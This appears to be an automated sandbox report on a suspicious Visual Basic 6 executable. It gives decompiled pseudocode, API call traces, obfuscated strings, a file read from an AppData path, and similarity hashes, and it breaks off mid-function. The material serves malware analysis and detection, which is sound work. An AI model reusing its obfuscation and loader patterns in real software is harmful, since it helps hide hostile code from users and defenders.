#696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 0042033B
#541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420350
__vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 0042035D
#696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 00420363
__vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 00420377
__vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 0042037F
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203DA
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203E4
#696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203EA
__vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203FF
__vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420407
#696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042045C
#648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042049E
__vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204B3
#648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204E8
__vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204FD
#651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420528
__vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420532
__vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420538
__vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420542
__vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042054A
__vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420552
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205A5
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205AD
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205B5
__vbaAryDestruct.MSVBVM60(00000000,?,004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205CC
__vbaFreeStr.MSVBVM60(00000000,?,004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205D4

Strings

2:2:2, xrefs: 00420347
Suppositoriets, xrefs: 00420457
PREHISTORICS, xrefs: 00420126
UNINTERMITTEDLY, xrefs: 004202B8
BESMUDSES, xrefs: 0042051F
Jiggerens, xrefs: 0042008A
Rappees, xrefs: 00420085
MINESTRYGNING, xrefs: 00420336
:, xrefs: 004202A4

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
API String ID: 2160480785-2797486545
Opcode ID: 99d5d1945da234d3eb21bbea69b2c24f2def652990e0d9fe3f0f05b968b7193f
Instruction ID: 247844ea3c9e4145d6387bb99d9b60c49b8363080f8287a008bbd778335b1946
Opcode Fuzzy Hash: 99d5d1945da234d3eb21bbea69b2c24f2def652990e0d9fe3f0f05b968b7193f
Instruction Fuzzy Hash: 36027E71900218ABDB15EBA0DC96FEDB7B8BF04304F10816FE105BB1E2EB789A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD7C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041DD7C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				char _v64;
				char _v80;
				char _v96;
				char* _v104;
				char _v112;
				char* _v120;
				char _v128;
				void* _v148;
				short _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				short _t78;
				signed int _t79;
				char* _t83;
				char* _t88;
				signed int _t99;
				signed int _t104;
				intOrPtr _t132;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				L00401540();
				_v12 = _t132;
				_v8 = 0x401270;
				_push(L"Scopiformly9");
				_push(L"baadene");
				_push( &_v64); // executed
				L00401732(); // executed
				_v104 = L"Ambulancesagen2";
				_v112 = 0x8008;
				_push( &_v64);
				_t78 =  &_v112;
				_push(_t78);
				L00401738();
				_v152 = _t78;
				L00401828();
				_t79 = _v152;
				if(_t79 != 0) {
					_push(0x1b);
					_push(L"Reklamekampagne4");
					L00401750();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v172 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v172 = 0x4223c0;
					}
					_v152 =  *_v172;
					_t99 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
					asm("fclex");
					_v156 = _t99;
					if(_v156 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v152);
						_push(_v156);
						L004017C8();
						_v176 = _t99;
					}
					_v160 = _v48;
					_t104 =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t104;
					if(_v164 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x4025ac);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v180 = _t104;
					}
					_t79 = _v148;
					_v40 = _t79;
					L004017C2();
				}
				L004017B6();
				_push(0x44);
				_push(_v36);
				L00401750();
				L0040183A();
				_push(_t79);
				_push(L"Jordfstedes4");
				L0040172C();
				asm("sbb eax, eax");
				_v152 =  ~( ~( ~_t79));
				L00401846();
				_t83 = _v152;
				if(_t83 != 0) {
					_v104 = L"appdata";
					_v112 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L0040171A();
					_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
					_v128 = 8;
					_push( &_v80);
					_push( &_v128);
					_t88 =  &_v96;
					_push(_t88);
					L00401720();
					_push(_t88);
					L00401834();
					L0040183A();
					_push(_t88);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v32);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0xec);
					_push( &_v64);
					L00401708();
					_t83 =  &_v64;
					_push(_t83);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(0x41e068);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t83;
			}

0x0041dd81
0x0041dd8c
0x0041dd8d
0x0041dd99
0x0041dda1
0x0041dda4
0x0041ddab
0x0041ddb0
0x0041ddb8
0x0041ddb9
0x0041ddbe
0x0041ddc5
0x0041ddcf
0x0041ddd0
0x0041ddd3
0x0041ddd4
0x0041ddd9
0x0041dde3
0x0041dde8
0x0041ddf1
0x0041ddf7
0x0041ddf9
0x0041ddfe
0x0041de08
0x0041de14
0x0041de31
0x0041de16
0x0041de16
0x0041de1b
0x0041de20
0x0041de25
0x0041de25
0x0041de43
0x0041de5b
0x0041de5e
0x0041de60
0x0041de6d
0x0041de8f
0x0041de6f
0x0041de6f
0x0041de71
0x0041de76
0x0041de7c
0x0041de82
0x0041de87
0x0041de87
0x0041de99
0x0041deb4
0x0041deba
0x0041debc
0x0041dec9
0x0041deee
0x0041decb
0x0041decb
0x0041ded0
0x0041ded5
0x0041dedb
0x0041dee1
0x0041dee6
0x0041dee6
0x0041def5
0x0041defc
0x0041df03
0x0041df03
0x0041df10
0x0041df15
0x0041df17
0x0041df1a
0x0041df24
0x0041df29
0x0041df2a
0x0041df2f
0x0041df36
0x0041df3c
0x0041df46
0x0041df4b
0x0041df54
0x0041df5a
0x0041df61
0x0041df6e
0x0041df76
0x0041df7a
0x0041df7b
0x0041df80
0x0041df87
0x0041df91
0x0041df95
0x0041df96
0x0041df99
0x0041df9a
0x0041df9f
0x0041dfa0
0x0041dfaa
0x0041dfaf
0x0041dfb0
0x0041dfb2
0x0041dfb4
0x0041dfb9
0x0041dfc1
0x0041dfc9
0x0041dfcd
0x0041dfd1
0x0041dfd2
0x0041dfd4
0x0041dfdc
0x0041dfe1
0x0041dfe2
0x0041dfe4
0x0041dfe9
0x0041dfeb
0x0041dff0
0x0041dff8
0x0041dff9
0x0041dffe
0x0041e001
0x0041e002
0x0041e00c
0x0041e014
0x0041e014
0x0041e019
0x0041e04a
0x0041e052
0x0041e05a
0x0041e062
0x0041e067

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041DD99
#692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041DDB9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041DDD4
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041DDE3
#618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DDFE
__vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DE08
__vbaNew2.MSVBVM60(0040259C,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041DE20
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DE82
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DEE1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DF03
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DF10
#618.MSVBVM60(?,00000044,00008008,?), ref: 0041DF1A
__vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DF24
__vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF2F
__vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF46
__vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF6E
#666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF7B
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF9A
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFA0
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFAA
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFB9
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFC1
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DFD4
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DFE4
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DFEB
#526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DFF9
__vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E002
__vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E00C
__vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E014
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E04A
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E052
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E05A
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E062

Strings

appdata, xrefs: 0041DF5A
Scopiformly9, xrefs: 0041DDAB
CONTINUATOR, xrefs: 0041DF08
\XvFu5flZcgudIlwvVLtjOx372, xrefs: 0041DF80
Ambulancesagen2, xrefs: 0041DDBE
Jordfstedes4, xrefs: 0041DF2A
Reklamekampagne4, xrefs: 0041DDF9
baadene, xrefs: 0041DDB0

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
API String ID: 3805544571-2284846736
Opcode ID: 4722b21ee1cf255405dc4c68612446d92cf5e35516269fcb109170723b20a3ff
Instruction ID: ab1f30ff9109013bb15fdbf0051d3cce643812e99e5e35539fe9f4867291def5
Opcode Fuzzy Hash: 4722b21ee1cf255405dc4c68612446d92cf5e35516269fcb109170723b20a3ff
Instruction Fuzzy Hash: 3D712971E00218AADB10EBA1CD46FDEB7B8AF04704F50817AF109B71E2DB785A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420764, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00420764(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _v52;
				char _v56;
				void* _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				char* _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _t182;
				signed int _t207;
				char* _t208;
				signed int _t219;
				char* _t221;
				signed int _t223;
				signed int _t229;
				void* _t231;
				signed int _t234;
				char* _t239;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t252;
				void* _t254;
				void* _t259;
				void* _t261;
				void* _t263;
				void* _t273;
				void* _t282;
				void* _t284;
				intOrPtr _t285;
				void* _t286;

				_t285 = _t284 - 0x18;
				 *[fs:0x0] = _t285;
				L00401540();
				_v28 = _t285;
				_v24 = 0x4013f0;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t282);
				_v8 = 1;
				_v8 = 2;
				_v68 = 0x4fdf6b;
				_v76 = 3;
				_push( &_v76);
				_push( &_v92);
				L0040160C();
				_push( &_v92);
				_push( &_v108);
				L004016BA();
				_v148 = L"FOSTERET";
				_v156 = 0x8008;
				_push( &_v108);
				_t182 =  &_v156;
				_push(_t182);
				L004016AE();
				_v160 = _t182;
				_push( &_v108);
				_push( &_v92);
				_push( &_v76);
				_push(3);
				L00401840();
				_t286 = _t285 + 0x10;
				if(_v160 != 0) {
					_v8 = 3;
					if( *0x4223c0 != 0) {
						_v196 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v196 = 0x4223c0;
					}
					_v160 =  *_v196;
					_t229 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v60);
					asm("fclex");
					_v164 = _t229;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v200 = _t229;
					}
					_v168 = _v60;
					_v132 = 0x80020004;
					_v140 = 0xa;
					_t231 = 0x10;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004016B4();
					L0040183A();
					_t234 =  *((intOrPtr*)( *_v168 + 0x13c))(_v168, _t231, 0x5e4c2e);
					asm("fclex");
					_v172 = _t234;
					if(_v172 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4025ac);
						_push(_v168);
						_push(_v172);
						L004017C8();
						_v204 = _t234;
					}
					L00401846();
					L004017C2();
					_v8 = 4;
					_v68 = 0x16;
					_v76 = 2;
					_push( &_v76);
					_push( &_v92);
					L00401606();
					_v100 = 0xb8;
					_v108 = 2;
					_push( &_v108);
					_push(0xa1);
					_push( &_v92);
					_t239 =  &_v56;
					_push(_t239);
					L00401858();
					_push(_t239);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push(3);
					L00401840();
					_t286 = _t286 + 0x10;
				}
				_v8 = 6;
				_push(0);
				_push(9);
				_push(1);
				_push(3);
				_push( &_v48);
				_push(4);
				_push(0x80);
				L00401600();
				_v8 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (0 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x27c30;
				_v8 = 8;
				_t246 = 1;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t246 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x94a0c;
				_v8 = 9;
				_t248 = 2;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t248 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2164a4;
				_v8 = 0xa;
				_t250 = 3;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t250 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5d9b94;
				_v8 = 0xb;
				_t252 = 4;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t252 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5a7363;
				_v8 = 0xc;
				_t254 = 5;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t254 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2787b7;
				_v8 = 0xd;
				_v68 =  *0x40146c;
				_v76 = 4;
				_push( &_v92);
				_t207 =  &_v76;
				_push(_t207);
				L004017A4();
				_v160 = _t207;
				if(_v160 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(_v160);
					L0040179E();
					_v208 = _t207;
				}
				_t208 =  &_v92;
				_push(_t208);
				L0040178C();
				_t273 = 6;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t273 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t208;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L00401840();
				_v8 = 0xe;
				_t259 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t259 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x37e4a9;
				_v8 = 0xf;
				_t261 = 8;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t261 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x84c244;
				_v8 = 0x10;
				_t263 = 9;
				_t219 =  *(_v48 + 0xc);
				 *((intOrPtr*)(_t219 + (_t263 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x635cea;
				_v8 = 0x11;
				if((_t219 | 0xffffffff) != 0) {
					_v8 = 0x12;
					_v44 = 0x29c1aa;
					_v8 = 0x13;
					_t223 = _v44 ^ 0x0018dd5b;
					_v44 = _t223;
					_v8 = 0x14;
					_push(0xffffffff);
					L004016E4();
					_v8 = 0x15;
					_push(0x3ed0fd);
					L004016B4();
					L0040183A();
					_push(_t223); // executed
					L004015FA(); // executed
					_v40 = _t223;
					L00401846();
				}
				asm("wait");
				_push(0x420c28);
				_t221 =  &_v48;
				_push(_t221);
				_push(0);
				L0040173E();
				L00401846();
				return _t221;
			}

0x00420767
0x00420776
0x00420782
0x0042078a
0x0042078d
0x00420794
0x0042079b
0x004207aa
0x004207ad
0x004207b4
0x004207bb
0x004207c2
0x004207cc
0x004207d0
0x004207d1
0x004207d9
0x004207dd
0x004207de
0x004207e3
0x004207ed
0x004207fa
0x004207fb
0x00420801
0x00420802
0x00420807
0x00420811
0x00420815
0x00420819
0x0042081a
0x0042081c
0x00420821
0x0042082d
0x00420833
0x00420841
0x0042085e
0x00420843
0x00420843
0x00420848
0x0042084d
0x00420852
0x00420852
0x00420870
0x00420888
0x0042088b
0x0042088d
0x0042089a
0x004208bc
0x0042089c
0x0042089c
0x0042089e
0x004208a3
0x004208a9
0x004208af
0x004208b4
0x004208b4
0x004208c6
0x004208cc
0x004208d3
0x004208df
0x004208e0
0x004208ed
0x004208ee
0x004208ef
0x004208f0
0x004208f6
0x00420900
0x00420914
0x0042091a
0x0042091c
0x00420929
0x0042094e
0x0042092b
0x0042092b
0x00420930
0x00420935
0x0042093b
0x00420941
0x00420946
0x00420946
0x00420958
0x00420960
0x00420965
0x0042096c
0x00420973
0x0042097d
0x00420981
0x00420982
0x00420987
0x0042098e
0x00420998
0x00420999
0x004209a1
0x004209a2
0x004209a5
0x004209a6
0x004209ab
0x004209ac
0x004209b6
0x004209be
0x004209c6
0x004209ca
0x004209ce
0x004209cf
0x004209d1
0x004209d6
0x004209d6
0x004209d9
0x004209e0
0x004209e2
0x004209e4
0x004209e6
0x004209eb
0x004209ec
0x004209ee
0x004209f3
0x004209fb
0x00420a10
0x00420a17
0x00420a23
0x00420a2d
0x00420a34
0x00420a40
0x00420a4a
0x00420a51
0x00420a5d
0x00420a67
0x00420a6e
0x00420a7a
0x00420a84
0x00420a8b
0x00420a97
0x00420aa1
0x00420aa8
0x00420ab5
0x00420ab8
0x00420ac2
0x00420ac3
0x00420ac6
0x00420ac7
0x00420acc
0x00420ad9
0x00420aee
0x00420adb
0x00420adb
0x00420ae1
0x00420ae6
0x00420ae6
0x00420af5
0x00420af8
0x00420af9
0x00420b03
0x00420b0d
0x00420b13
0x00420b17
0x00420b18
0x00420b1a
0x00420b22
0x00420b2e
0x00420b38
0x00420b3f
0x00420b4b
0x00420b55
0x00420b5c
0x00420b68
0x00420b6f
0x00420b72
0x00420b79
0x00420b85
0x00420b87
0x00420b8e
0x00420b95
0x00420b9f
0x00420ba4
0x00420ba7
0x00420bae
0x00420bb0
0x00420bb5
0x00420bbc
0x00420bc1
0x00420bcb
0x00420bd0
0x00420bd1
0x00420bd6
0x00420bdc
0x00420bdc
0x00420be1
0x00420be2
0x00420c14
0x00420c17
0x00420c18
0x00420c1a
0x00420c22
0x00420c27

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420782
#575.MSVBVM60(?,00000003), ref: 004207D1
#518.MSVBVM60(?,?,?,00000003), ref: 004207DE
__vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420802
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042081C
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,00401546), ref: 0042084D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 004208AF
__vbaChkstk.MSVBVM60(00000000,?,0040258C,00000014), ref: 004208E0
__vbaStrI4.MSVBVM60(005E4C2E), ref: 004208F6
__vbaStrMove.MSVBVM60(005E4C2E), ref: 00420900
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420941
__vbaFreeStr.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420958
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420960
#573.MSVBVM60(?,00000002), ref: 00420982
__vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004209A6
#628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209AC
__vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209B6
__vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209BE
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004209D1
__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 004209F3
#564.MSVBVM60(00000004,?), ref: 00420AC7
__vbaHresultCheck.MSVBVM60(00000000), ref: 00420AE1
__vbaI4Var.MSVBVM60(?), ref: 00420AF9
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 00420B1A
__vbaOnError.MSVBVM60(000000FF), ref: 00420BB0
__vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 00420BC1
__vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 00420BCB
#578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420BD1
__vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420BDC
__vbaAryDestruct.MSVBVM60(00000000,?,00420C28), ref: 00420C1A
__vbaFreeStr.MSVBVM60(00000000,?,00420C28), ref: 00420C22

Strings

FOSTERET, xrefs: 004207E3

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
String ID: FOSTERET
API String ID: 53557705-1574993597
Opcode ID: 0890c9e809bcba8642060cf1f6caa0165c5b5b78d3c7a37c562a37d4fd51ebc9
Instruction ID: 0a74493fcb3b3f3581d043cebca2ef6a7ffca69fdbafcbed18917615b5d4a0b9
Opcode Fuzzy Hash: 0890c9e809bcba8642060cf1f6caa0165c5b5b78d3c7a37c562a37d4fd51ebc9
Instruction Fuzzy Hash: 18D1F9B5900218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB4D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041EB4D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _v76;
				intOrPtr _v84;
				signed int _v108;
				char _v116;
				short _v120;
				char* _t30;
				char* _t33;
				short _t34;
				short _t35;
				intOrPtr _t56;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t56;
				_push(0x68);
				L00401540();
				_v12 = _t56;
				_v8 = 0x401310;
				L004017B6();
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v52); // executed
				L004016F0(); // executed
				_t30 =  &_v52;
				_push(_t30);
				L004016F6();
				_push(_t30);
				_push( &_v28);
				L004016FC();
				L00401828();
				_v76 = L"Gulsoterne";
				_v84 = 8;
				_v108 = _v108 & 0x00000000;
				_v116 = 0x8002;
				_push(0x10);
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v28);
				_t33 =  &_v52;
				_push(_t33); // executed
				L004016EA(); // executed
				_push(_t33);
				_t34 =  &_v116;
				_push(_t34);
				L00401738();
				_v120 = _t34;
				L00401828();
				_t35 = _v120;
				if(_t35 != 0) {
